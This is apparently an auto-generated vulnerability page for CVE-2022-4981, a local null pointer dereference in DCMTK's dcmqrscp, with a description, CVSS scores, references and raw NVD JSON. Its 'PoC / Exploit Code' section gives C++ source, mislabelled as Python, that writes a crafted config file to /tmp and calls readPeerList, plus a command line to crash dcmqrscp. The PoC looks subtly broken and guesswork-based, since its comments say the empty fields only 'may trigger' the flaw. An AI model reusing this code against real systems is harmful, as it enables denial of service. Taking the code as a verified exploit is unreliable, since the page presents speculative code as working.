CVE-2022-4981

Description

A vulnerability was detected in DCMTK up to 3.6.7. The impacted element is the function DcmQueryRetrieveConfig::readPeerList of the file /dcmqrcnf.cc of the component dcmqrscp. The manipulation results in null pointer dereference. The attack needs to be approached locally. The exploit is now public and may be used. Upgrading to version 3.6.8 is sufficient to resolve this issue. The patch is identified as 957fb31e5. Upgrading the affected component is advised.

CVSS Details

CVSS Score

3.3

Severity

LOW

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:offis:dcmtk:*:*:*:*:*:*:*:* - VULNERABLE

DCMTK < 3.6.8

DCMTK 3.6.7

DCMTK 3.6.6及更早版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2022-4981 - DCMTK dcmqrscp Null Pointer Dereference PoC
// This PoC demonstrates triggering a null pointer dereference in
// DcmQueryRetrieveConfig::readPeerList function (/dcmqrcnf.cc)
//
// Prerequisites:
//   - DCMTK <= 3.6.7 installed
//   - Local access with low privileges
//   - Ability to modify or supply a malicious configuration file

#include "dcmtk/dcmqr/dcmqrcnf.h"
#include "dcmtk/dcmdata/dcfilefo.h"
#include <iostream>
#include <fstream>

int main(int argc, char* argv[]) {
    // Step 1: Create a malicious peer list configuration file
    // The configuration file is crafted to trigger null pointer dereference
    // in DcmQueryRetrieveConfig::readPeerList()
    const char* malicious_config =
        "PeerList BEGIN\n"
        "  MyPeer\n"
        "    AETitle  TEST_AE\n"
        "    HostName  127.0.0.1\n"
        "    Port      11112\n"
        "  MyPeer2\n"
        "    AETitle  \n"  // Empty AETitle may trigger null pointer path
        "    HostName  \n"  // Empty HostName may trigger null pointer path
        "    Port      0\n"
        "PeerList END\n";

    // Step 2: Write the malicious configuration to a temp file
    const char* config_path = "/tmp/malicious_dcmqrscp.cfg";
    std::ofstream config_file(config_path);
    if (!config_file.is_open()) {
        std::cerr << "[-] Failed to create config file" << std::endl;
        return 1;
    }
    config_file << malicious_config;
    config_file.close();

    std::cout << "[*] Malicious config written to: " << config_path << std::endl;

    // Step 3: Initialize DcmQueryRetrieveConfig and trigger readPeerList
    DcmQueryRetrieveConfig config;

    // Step 4: Call readPeerList with the malicious configuration
    // This will trigger the null pointer dereference vulnerability
    OFCondition result = config.readPeerList(config_path);

    if (result.bad()) {
        std::cout << "[*] readPeerList returned error (may indicate crash path)" << std::endl;
    }

    // Step 5: Alternatively, use dcmqrscp command-line tool directly
    // Command: dcmqrscp -c /tmp/malicious_dcmqrscp.cfg
    // This will trigger the null pointer dereference when parsing peer entries

    return 0;
}

// Alternative trigger via command line:
// 1. Create config file with malformed peer entries
// 2. Run: dcmqrscp --config /tmp/malicious_dcmqrscp.cfg
// 3. Observe segfault/null pointer dereference crash

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-4981
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-4981
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-4981/
[4] VulDB https://vuldb.com/cve/CVE-2022-4981
[5] https://shimo.im/docs/e1Azd4dDQXUgOGqW/
[6] https://support.dcmtk.org/redmine/issues/1026
[7] https://vuldb.com/?ctiid.329029
[8] https://vuldb.com/?id.329029
[9] https://vuldb.com/?submit.673134
[10] https://shimo.im/docs/e1Azd4dDQXUgOGqW/read

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-4981", "sourceIdentifier": "[email protected]", "published": "2025-10-21T15:15:37.550", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in DCMTK up to 3.6.7. The impacted element is the function DcmQueryRetrieveConfig::readPeerList of the file /dcmqrcnf.cc of the component dcmqrscp. The manipulation results in null pointer dereference. The attack needs to be approached locally. The exploit is now public and may be used. Upgrading to version 3.6.8 is sufficient to resolve this issue. The patch is identified as 957fb31e5. Upgrading the affected component is advised."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-404"}, {"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:offis:dcmtk:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.6.8", "matchCriteriaId": "5740DABF-EF27-4531-B285-3F700AB959CC"}]}]}], "references": [{"url": "https://shimo.im/docs/e1Azd4dDQXUgOGqW/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://support.dcmtk.org/redmine/issues/1026", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}, {"url": "https://vuldb.com/?ctiid.329029", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.329029", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.673134", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://shimo.im/docs/e1Azd4dDQXUgOGqW/read", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}